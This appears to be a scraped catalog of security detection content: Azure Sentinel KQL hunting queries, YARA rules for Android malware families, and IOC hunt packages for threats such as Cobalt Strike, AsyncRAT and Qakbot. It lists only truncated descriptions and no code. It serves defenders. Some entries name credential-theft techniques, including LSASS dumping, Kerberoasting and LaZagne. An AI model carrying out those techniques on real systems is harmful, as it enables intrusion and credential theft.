IdentityDirectoryEvents

Find accounts that have been deleted and by whom

huntingmicrosoftofficial
Yara-Rules source

This rule detects the apk related to hackingteam - These certificates are present in mailboxes of hackingteam

community
Yara-Rules source

Applications with Installer as an application name

community
Azure-Sentinel source
T1566
EmailAttachmentInfo

JNLP file extensions are an uncommon file type often used to deliver malware.

huntingmicrosoftofficial
Yara-Rules source

Mapin trojan, not for droppers

backdoorcommunity
Azure-Sentinel source
IdentityDirectoryEvents

Find accounts that have been added/removed from groups in AD.

huntingmicrosoftofficial
Yara-Rules source

Moskow Droid Development

community
MultipleLdaps
kql medium
Azure-Sentinel source
IdentityQueryEvents

Detect multiple Active Directory LDAP queries made in a bin time. Replace 10 on line 1 with your desired threshold. Replace 1m on line 2 with your desired bin time.

huntingmicrosoftofficial
Azure-Sentinel source
IdentityQueryEvents

// Detect multiple sensitive Active Directory LDAP queries made in a bin time // Sensitive queries are defined as Roasting or sensitive object queries // Replace 10 on line 6 with your desired threshold //

huntingmicrosoftofficial
Azure-Sentinel source

This query searches for not onboarded devices with a specific Suffix

huntingmicrosoftofficial
PasswordSearch
kql medium
Azure-Sentinel source
IdentityQueryEvents

Detect Active Directory LDAP queries that search for users with a comment or description containing the string "pass", which might reveal the user's password. This LDAP query covers MetaSploit - enum_

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Qakbot blight lingers, seeds ransomware. Qakbot is malware that steals login credentials from banking and financial services. It has

backdoorcredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, Qakbot blight lingers, seeds ransomware. Qakbot is malware that steals login credentials from banking and financial services. It has

backdoorcredential-thefthuntingmicrosoftofficialransomware
Retefe
yara low
Yara-Rules source

Retefe

community
Roasting
kql medium
Azure-Sentinel source
DeviceNetworkEventsIdentityQueryEvents

Detect Active Directory LDAP queries that search for Kerberoasting targets (SPNs) or accounts with Kerberos preauthentication not required, as seen by Azure ATP, and try to get the process that initiated the LDAP query f

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query provides insights into the detections made by Safe Attachments.

huntingmicrosoftofficial
Azure-Sentinel source

This query lists the connected networks that have been seen.

huntingmicrosoftofficial
Azure-Sentinel source

This query lists the IPAddressV4 network subnets that have been seen.

huntingmicrosoftofficial
Azure-Sentinel source

This query lists the IPAddressV6 network subnets that have been seen.

huntingmicrosoftofficial
SensitiveLdaps
kql medium
Azure-Sentinel source
IdentityQueryEvents

Detect Active Directory LDAP queries that search for sensitive objects in the organization. This LDAP query covers the BloodHound tool.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

Query for processes that accessed more than 10 IP addresses over port 445 (SMB) - possibly scanning for network shares. To read more about Network Share Discovery, see: https://attack.mitre.org/wiki/T

huntingmicrosoftofficial
Yara-Rules source

sms-fraud examples

community
Yara-Rules source

This is just an example

community
smsfraud chinese
yara low
Yara-Rules source

smsfraud chinese

community
Yara-Rules source

This rule detects APKs related to SMS fraud.

community
smspay chinnese
yara low
Yara-Rules source

YARA rule: smspay_chinnese

community
SPF Failure Trend
kql medium
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Spoof - SPF fails summarizing the data daily.

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query helps check for spoofing attempts on the domain that show authentication failures.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Attackers can use AdFind, an administrative tool, to gather information about domain controllers or ADFS servers. They may also rename the executable to look like other benign tools on the system. The below

backdoorhuntingmicrosoftofficialransomware
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 20 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 107 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 5 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 51 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

AsyncRAT is a remote access Trojan that enables attackers to execute commands, steal data, and maintain persistent access to compromised systems. It typically arrives via phishing emails, malicious downloads, or exploit kits leveraging IP:port connections to establish command-and-control communication. SOC analysts should monitor for unusual outbound traffic on listed ports, signs of lateral

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 7 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Meterpreter

iocthreatfoxwin-meterpreter
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 3 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Remcos

iocthreatfoxwin-remcos
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Spoof-DMARC fails detections summarizing the data by the top email sender P2 domain (SenderFromDomain) and sender P1 domain (SenderMailFromDomain).

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish-Spoof-external domain detections summarizing the data by the top 10 email sender P2 domain (SenderFromDomain) and sender P1 domain (SenderMailFromDomain).

huntingmicrosoftofficial
Azure-Sentinel source
T1566
EmailEvents

This query visualises total emails with Phish-Spoof-internal domain detections summarizing the data by the top 10 email sender P2 domain (SenderFromDomain) and sender P1 domain (SenderMailFromDomain).

huntingmicrosoftofficial
Yara-Rules source

Ruleset to detect the Android pornclicker trojan, which connects to a remote host and obtains JavaScript and a list of generated URLs, ultimately leading to porn.

backdoorcommunity
URL Detection
kql medium
Azure-Sentinel source
DeviceNetworkEvents

This query finds network communication to a specific URL. Please note that in line #7 it filters RemoteUrl using the has operator, which looks for a "whole term" and runs faster. Example: RemoteUrl has "mic

backdoorhuntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 46 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 54 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 18 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 8 malicious URLs tagged as ua-wget

iocurlhaus
VulnComputers
kql medium
Azure-Sentinel source
IdentityQueryEvents

Detect Active Directory LDAP queries that try to find operating systems affected by specific vulnerabilities. This LDAP query covers the MetaSploit - enum_ad_computers tool.

backdoorhuntingmicrosoftofficial
Yara-Rules source

The 'with_attachment' YARA rule detects files containing attachments, which may indicate malicious payloads or phishing attempts. SOC teams should deploy this rule in email gateways, endpoint EDR scanning, and file share monitoring to identify suspicious attachments in network traffic and stored files.

community
Yara-Rules source

The 'with_images' YARA rule detects the presence of one or more image files within a payload, potentially

community
Yara-Rules source

Rule to detect the presence of one or several URLs.

community
Yara-Rules source

Rule to detect the absence of any attachment.

community
Yara-Rules source

Rule to detect the absence of any image.

community
Yara-Rules source

Rule to detect the absence of any URL.

community
xbot007
yara low
Yara-Rules source

YARA rule: xbot007

community
Azure-Sentinel source
CloudAppEvents

This query will find when federation trust settings are changed for a domain or when the domain is changed from managed to federated authentication. Results will relate to when a new Active Directory

aptbackdoorhuntingmicrosoftofficial
Adware
yara low
Yara-Rules source

Adware

community
alt-data-streams
kql medium
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse

exploithuntingmicrosoftofficialransomware
Yara-Rules source

YARA rule for variants of Trojan-Banker.AndroidOS.Tordow. Test rule.

backdoorcommunity
Yara-Rules source

The YARA rule 'android_mazarBot_z' detects Android malware associated with the MazarBOT family, which is known for credential theft and lateral movement. SOC teams should deploy this

community
Yara-Rules source

This rule detects apps made with the Metasploit framework.

community
Yara-Rules source

YARA rule: android_meterpreter

community
Yara-Rules source

This rule tries to detect OmniRat.

backdoorcommunity
Yara-Rules source

This rule detects the banker trojan with overlay functionality.

backdoorcommunity
Yara-Rules source

YARA detection for the Android locker app named Pink Club.

community
Yara-Rules source

The YARA rule Android_RuM

community
Yara-Rules source

This rule tries to detect Android.Banking.RuMMS.

community
Yara-Rules source

This

community
Yara-Rules source

This rule detects Android wifi Switcher variants

community
Yara-Rules source

YARA rule: android_tempting_cedar_spyware

community
Yara-Rules source

This rule tries to detect Android.Triada.Malware.

community
Azure-Sentinel source

This query finds anomalous models discovered

huntingmicrosoftofficial
Yara-Rules source

Virus de la Policia - android

community
Yara-Rules source

BankBot/Mazain attacking Polish banks

community
Azure-Sentinel source

This query surfaces devices that were discovered by Microsoft Defender for Endpoint and can be onboarded

huntingmicrosoftofficial
chinese porn
yara low
Yara-Rules source

YARA rule: chinese_porn

community
chinese2
yara low
Yara-Rules source

YARA rule: chinese2

community
chineseporn4
yara low
Yara-Rules source

YARA rule: chineseporn4

community
chineseporn5
yara low
Yara-Rules source

YARA rule: chineseporn5

community
clear-system-logs
kql medium
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse

huntingmicrosoftofficialransomware
Azure-Sentinel source

This query shows how common each operating system is in the inventory.

backdoorhuntingmicrosoftofficial
Azure-Sentinel source

This query presents statistics on the count and percentage of each DeviceType out of the total inventory.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceFileEvents

Adversaries may use obfuscated .jse files to deploy

backdoorevasionhuntingmicrosoftofficialransomware
Azure-Sentinel source

This query finds devices by DeviceType and/or DeviceSubtype

huntingmicrosoftofficial
Azure-Sentinel source

This query surfaces devices that are in a specific IPAddressV4 subnet

huntingmicrosoftofficial
Azure-Sentinel source

This query surfaces devices that are in a specific IPAddressV6 subnet

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEventsDeviceProcessEvents

To evade security software and analyst tools, Nobelium malware enumerates the target system looking for certain running processes, loaded drivers, and registry keys, with the goal of disabling them. T

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceEventsDeviceFileEvents

This query looks for a Word document attachment, from which a link was clicked, and after which there was a browser download. This query is not noisy, but most of its results are clean. It can also hs

huntingmicrosoftofficialphishing
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Doppelpaymer: More human-operated ransomware. There is also a related blog. DoppelPaymer is ransomware that is spread manually by hu

backdoorcredential-thefthuntingmicrosoftofficialransomware
dowgin
yara low
Yara-Rules source

YARA rule: dowgin

community
Azure-Sentinel source
DeviceFileEvents

This query looks for user content downloads from Dropbox that originate from a link/redirect from a third-party site. File sharing sites such as Dropbox are often used for hosting malware on a reputable

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEventsDeviceFileEvents

Look for links opened from outlook.exe, followed by a browser download and then a SmartScreen app warning that was ignored by the user. Read more about these events and this hunting approach in this p

huntingmicrosoftofficial
Azure-Sentinel source
TExploitation for Client Execution

This query finds software by name and/or version.

huntingmicrosoftofficial
genericSMS
yara low
Yara-Rules source

YARA rule: genericSMS

community
genericSMS2
yara low
Yara-Rules source

YARA rule: genericSMS2

community
Gootkit-malware
kql medium
Azure-Sentinel source
AlertEvidenceDeviceNetworkEvents

This query was originally published on Twitter, by @MsftSecIntel. Gootkit is malware that started life as a banking trojan, and has since extended its capabilities to allow for a variety of malicious

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEventsDeviceProcessEvents

This query was originally published in the threat analytics report, Adwind utilizes Java for cross-platform impact. Adwind is a remote access tool (RAT) that takes advantage of the cross-platform capa

aptbackdoorevasionhuntingmicrosoftofficial
Leadbolt
yara low
Yara-Rules source

Leadbolt

community
Azure-Sentinel source

This query was originally published in the threat analytics report, CVE-2020-0601 certificate validation vulnerability. The Windows CryptoAPI Spoofing Vulnerability, CVE-2020-0601, can be exploited to

exploithuntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

This query will find applications that have been granted Mail.Read or Mail.ReadWrite permissions to which the corresponding user recently consented. It can help identify applications that have been

apthuntingmicrosoftofficial
Yara-Rules source

The YARA rule 'marcher_v2' detects a new variant of the Marcher malware family, likely used for

community
marcher2
yara low
Yara-Rules source

YARA rule: marcher2

community
marcher3
yara low
Yara-Rules source

YARA rule: marcher3

community
Yara-Rules source

YARA rule: Metasploit_Payload

community
Azure-Sentinel source

This query provides the most common services discovered

huntingmicrosoftofficial
Azure-Sentinel source

This query searches for devices that are not onboarded and have a specific prefix.

huntingmicrosoftofficial
Open email link
kql medium
Azure-Sentinel source
AlertEvidenceDeviceEvents

Query for links opened from mail apps where a detection occurred right afterwards. As many links are opened from mails, a successful hunt needs some filter or join with some othe

huntingmicrosoftofficialphishing
Azure-Sentinel source
DeviceEventsDeviceFileEvents

Pivot from downloads detected by Windows Defender Antivirus to other files downloaded from the same sites. To learn more about the download URL info that is available and see other sample queries, Ch

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Identifies potential service tampering related to Microsoft Defender services. Query inspired by the Azure Sentinel detection https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Multipl

huntingmicrosoftofficial
powercat-download
kql medium
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne

exploithuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Qakbot blight lingers, seeds ransomware. Qakbot is malware that steals login credentials from banking and financial services. It has

backdoorcredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

The hypothesis detects Qakbot malware attempting to self-delete to evade detection, a

backdoorcredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
T1218.010T1218.011
DeviceFileEventsDeviceImageLoadEvents

This query uses the locations from which malicious DLL images are often loaded by regsvr32.exe and rundll32.exe. Blog: https://threathunt.blog/dll-image-loads-from-suspicious-locations-by-regsvr32

huntingmicrosoftofficial
Azure-Sentinel source
T1218.010T1218.011
DeviceImageLoadEventsDeviceNetworkEvents

This query looks for regsvr32.exe or rundll32.exe loading DLL images with extensions other than .dll, and joins the data to public network events. References: https://threathunt.blog/running-live-mal

huntingmicrosoftofficial
Azure-Sentinel source
T1218.010T1218.011
DeviceNetworkEventsDeviceProcessEvents

This query looks for rundll32.exe or regsvr32.exe being spawned by abnormal processes: wscript.exe, powershell.exe, cmd.exe, pwsh.exe, cscript.exe. Blog: https://threathunt.blog/running-live-malware-f

huntingmicrosoftofficialpowershell
Yara-Rules source

This rule detects SandroRat

backdoorcommunity
sensual woman
yara low
Yara-Rules source

YARA rule: sensual_woman

community
shimcache-flushed
kql medium
Azure-Sentinel source
T1112
DeviceProcessEvents

This query searches for attempts to flush Shimcache, which may indicate anti-forensic or defense evasion activity by an attacker. Author: Vaasudev_Kala Ref: https://blueteamops.medium.com/shimcache-fl

evasionhuntingmicrosoftofficial
Yara-Rules source

The 'SlemBunk' YARA

backdoorcommunity
Yara-Rules source

This rule detects a kind of SMSFraud trojan

backdoorcommunity
smsfraud2
yara low
Yara-Rules source

YARA rule: smsfraud2

community
Yara-Rules source

The 'spyAgent'

community
Yara-Rules source

Ruleset to detect SpyNetV2 samples.

community
Yara-Rules source

Yara rule for detection of different Spynote Variants

community
Azure-Sentinel source
T1112
DeviceRegistryEvents

Looks for suspicious base64-encoded registry keys being created. Author: Jouni Mikkola References: https://threathunt.blog/registry-hunts/

huntingmicrosoftofficial
Azure-Sentinel source
T1112
DeviceRegistryEvents

Looks for suspicious additions of command interpreters to the Windows registry. Author: Jouni Mikkola References: https://threathunt.blog/registry-hunts/

huntingmicrosoftofficial
Azure-Sentinel source
T1112
DeviceRegistryEvents

Looks for suspicious keyword additions to the Windows registry. Author: Jouni Mikkola References: https://threathunt.blog/registry-hunts/

huntingmicrosoftofficial
Yara-Rules source

This rule detects tachi apps (not all malware)

community
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 7 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox: Evilginx IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Evilginx

elf-evilginxiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 59 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
DeviceFileEventsDnsEventsUrlClickEvents

Hunt package for 4 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 52 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 11 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with DCRat

backdooriocthreatfoxwin-dcrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Meterpreter

iocthreatfoxwin-meterpreter
ThreatFox: PlugX IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with PlugX

iocthreatfoxwin-plugx
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 32 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 4 IOCs associated with Remus

iocthreatfoxwin-remus
ThreatFox: Tofsee IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Tofsee

iocthreatfoxwin-tofsee
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Vidar is a data exfiltration malware that steals credentials and sensitive information via remote access, often leveraging stolen credentials for lateral movement. It typically arrives through phishing emails containing malicious URLs or via compromised domains used for command-and-control communication. SOC analysts should monitor for unusual outbound traffic to listed domains

iocthreatfoxwin-vidar
Yara-Rules source

Detection of dendroid trojan

backdoorcommunity
Trojan Droidjack
yara low
Yara-Rules source

YARA rule: Trojan_Droidjack

backdoorcommunity
Azure-Sentinel source
CloudAppEvents

This will show Active Directory Security Token Service (STS) refresh token modifications by Service Principals and Applications other than DirectorySync. Refresh tokens are used to validate identifica

backdoorhuntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 21 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 8 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as ascii

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 31 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 14 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 10 malicious URLs tagged as exe

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 31 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as sh

iocurlhaus
Yara-Rules source

Rule to detect Viking Order Botnet.

community
Azure-Sentinel source
DeviceRegistryEvents

This query was originally published in the threat analytics report, RDP ransomware persists as Wadhrama. The ransomware known as Wadhrama has been used in human-operated attacks that follow a particul

backdoorcredential-thefthuntingmicrosoftofficialransomware
wdigest-caching
kql medium
Azure-Sentinel source
DeviceProcessEventsDeviceRegistryEvents

This query was originally published in the threat analytics report, WDigest credential harvesting. WDigest is a legacy authentication protocol dating from Windows XP. While still used on some corporat

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
IdentityDirectoryEvents

This query shows all modifications to highly sensitive Active Directory groups (also known as Tier 0). Examples of these groups include Domain Admins, Schema Admins and Enterprise Admins. More info

huntingmicrosoftofficial
Yara-Rules source

BadMirror is Android malware. The malware sends information to its remote CnC (phone number, MAC address, list of installed applications...) but it also has the capability to execute a few commands s

community
Yara-Rules source

This rule tries to detect Clicker.G samples.

community
Yara-Rules source

The Android_Copy9 Y

community
Yara-Rules source

DeathRing is a Chinese Trojan that is pre-installed on a number of smartphones most popular in Asian and African countries. Detection volumes are moderate, though we consider this a concerning threat

backdoorcommunity
Yara-Rules source

This rule tries to detect Dendroid.

community
Yara-Rules source

This rule tries to detect Dogspectus.

community
Yara-Rules source

YARA rule for the initial Dogspectus ransomware APK.

communityransomware
Yara-Rules source

This rule tries to detect Android FakeBank_Fanta.

community
Yara-Rules source

This rule will be able to tag all the samples with local exploits.

communityexploit
Azure-Sentinel source
CloudAppEvents

This query looks for users accessing multiple other users' mailboxes, or accessing multiple folders in another user's mailbox. This query is inspired by an Azure Sentinel detection. Reference - https:

huntingmicrosoftofficial
Yara-Rules source

This YARA rule identifies malicious files containing backdoor or dropper functionality used to deploy additional malware. SOC teams should deploy it in endpoint EDR scanning, email gateways, and file share monitoring

backdoorcommunity
Banker Acecard
yara low
Yara-Rules source

YARA rule: Banker_Acecard

community
Yara-Rules source

http://research.zscaler.com/2015/07/fake-batterybotpro-clickfraud-adfruad.html

community
c2-bluekeep
kql medium
Azure-Sentinel source
DeviceNetworkEvents

This query was originally published in the threat analytics report, Exploitation of CVE-2019-0708 (BlueKeep). CVE-2019-0708, also known as BlueKeep, is a critical remote code execution vulnerability i

backdoorexploithuntingmicrosoftofficial
C2-NamedPipe
kql medium
Azure-Sentinel source
DeviceEvents

Detects the creation of a named pipe used by known APT malware. Reference - https://docs.microsoft.com/openspecs/windows_protocols/ms-wpo/4de75e21-36fd-440a-859b-75accc74487c

apthuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

This query was originally published in the threat analytics report, ShadowHammer supply chain attack. Operation ShadowHammer was an attack against ASUS computer hardware, using the company's own update

backdoorhuntingmicrosoftofficial
cobalt-strike
kql medium
Azure-Sentinel source
AlertEvidenceDeviceLogonEvents

This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse

cobalt-strikecredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceNetworkEvents

This query will break down hostnames into their second and third level domain parts and analyze the volume of connections made to the destination to look for low count entries. Note that this query is

backdoorhuntingmicrosoftofficial
Yara-Rules source

Dendroid evidence via Droidian service

community
Dendroid RAT
yara low
Yara-Rules source

Dendroid RAT

backdoorcommunity
Yara-Rules source

Dendroid evidence via ServiceReceiver

community
Azure-Sentinel source
DeviceNetworkEvents

Device Network Events Involving Low Count FQDNs. This query reduces network events to only those with the RemoteURL column populated, then parses the DNS name from the URL (if needed) and finds the l

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEventsDeviceNetworkEventsIdentityQueryEvents

This query looks for the DGA pattern of the domain associated with the Nobelium campaign, in order to find other domains with the same activity pattern. This query is inspired by an Azure Sentinel det

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Doppelpaymer: More human-operated ransomware. There is also a related blog. DoppelPaymer is ransomware that is spread manually by hu

backdoorcredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceEventsDeviceNetworkEventsDnsEventsIdentityQueryEvents

Looks for a logon domain in the Microsoft Entra ID logs, encoded with the same DGA encoding used in the Nobelium campaign. See Important steps for customers to protect themselves from recent nation-s

aptbackdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1548
CloudAppEvents

This query looks for Entra ID group adds identified by Microsoft Defender for Cloud Apps. It requires a corresponding app connector in Microsoft Defender for Cloud Apps.

huntingmicrosoftofficial
Azure-Sentinel source
T1548
CloudAppEvents

This query looks for Entra ID role adds identified by Microsoft Defender for Cloud Apps. It requires a corresponding app connector in Microsoft Defender for Cloud Apps.

huntingmicrosoftofficial
Yara-Rules source

Detects fake facebook applications

community
fake facebook
yara low
Yara-Rules source

YARA rule: fake_facebook

community
fake instagram
yara low
Yara-Rules source

The 'fake_instagram

community
fake king games
yara low
Yara-Rules source

YARA rule: fake_king_games

community
fake market
yara low
Yara-Rules source

YARA rule: fake_market

community
fake minecraft
yara low
Yara-Rules source

YARA rule: fake_minecraft

community
fake whatsapp
yara low
Yara-Rules source

YARA rule: fake_whatsapp

community
Azure-Sentinel source
CloudAppEvents

This query looks for file download events identified by Microsoft Defender for Cloud Apps. It requires a corresponding app connector in Microsoft Defender for Cloud Apps. Reference - https://lear

huntingmicrosoftofficial
Yara-Rules source

Detect Gamma/FinFisher FinSpy for Android #GovWare

community
Yara-Rules source

This rule automatically adds certificates present in malware

community
Azure-Sentinel source
DeviceProcessEvents

This hunting query looks for hosts exporting a mailbox from an on-prem Exchange server, followed by that same host removing the export within a short time window. This pattern has been observed by att

backdoorhuntingmicrosoftofficial
ibanking
yara low
Yara-Rules source

YARA rule: ibanking

communityibanking
Azure-Sentinel source
AlertEvidenceDeviceLogonEvents

This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. It finds all user accounts that have logged on to an endpoint affected by

backdoorcobalt-strikecredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
IdentityLogonEvents

This query shows attempts to request a Kerberos service ticket using the AS service, in order to monitor Kerberos AS authentications.

huntingmicrosoftofficial
Koler.A builds
yara low
Yara-Rules source

Koler.A builds

community
Koler.A class
yara low
Yara-Rules source

Koler.A class

community
Koler.D class
yara low
Yara-Rules source

Koler.D class

community
Yara-Rules source

Old Koler.A domains examples

community
Yara-Rules source

Detects samples repackaged by backdoor-apk shell script

backdoorcommunity
lazagne
kql medium
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Ryuk ransomware. There is also a related blog. Ryuk is human-operated ransomware. Much like DoppelPaymer ransomware, Ryuk is spread

backdoorcredential-thefthuntingmicrosoftofficialransomware
libyan scorpions
yara low
Yara-Rules source

YARA rule: libyan_scorpions

community
Azure-Sentinel source
EmailEventsIdentityLogonEvents

This query finds the 10 latest logons performed by email recipients within 30 minutes after they received known malicious emails. You can use this query to check whether the accounts of the email reci

huntingmicrosoftofficial
Azure-Sentinel source
T1003.001
DeviceEventsDeviceFileEvents

This query looks for signs of credential dumping based on process activity instead of targeting process names. Author: Jouni Mikkola More info: https://threathunt.blog/lsass-credential-dumping/

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

Identifies anomalous increases in Exchange mail items accessed operations. The query leverages KQL built-in anomaly detection algorithms to find large deviations from baseline patterns. Sudden increas

backdoorhuntingmicrosoftofficial
Yara-Rules source

This rule detects a type of banking malware.

community
Azure-Sentinel source
T1020
CloudAppEvents

This query looks for mass downloads identified by Microsoft Defender for Cloud Apps. It requires a corresponding app connector in Microsoft Defender for Cloud Apps.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEventsDeviceProcessEvents

This query was originally published in a threat analytics report about the group known to other security researchers as APT32 or OceanLotus. This tracked activity group uses a wide array of malicious d

aptexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

This query was originally published in a threat analytics report about the group known to other security researchers as APT32 or OceanLotus. This tracked activity group uses a wide array of malicious d

apthuntingmicrosoftofficial
Azure-Sentinel source

This query was originally published in the threat analytics report, Solorigate supply chain attack. Please note that these attacks are currently known as the Nobelium campaign. Microsoft detects the 2

aptbackdoorhuntingmicrosoftofficial
Private Key Files
kql medium
Azure-Sentinel source
DeviceFileEvents

Private Key Files. This query identifies file operations with files having one of the extensions commonly used to save a private key. The risk is that if an attacker were to obtain the file, they c

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne

credential-theftexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEventsDeviceProcessEvents

This query was originally published in the threat analytics report, EvilQuest signals the rise of Mac ransomware. As of the time of this writing (October 2020), ransomware designed to target macOS is

backdoorhuntingmicrosoftofficialransomware
Ransomware
yara low
Yara-Rules source

Ransomware

communityransomware
Yara-Rules source

Ransomware Test 2

communityransomware
recon-with-rundll
kql medium
Azure-Sentinel source
DeviceNetworkEvents

This query was originally published in the threat analytics report, Trickbot: Pervasive & underestimated. Trickbot is a very prevalent piece of malware with an array of malicious capabilities. Origina

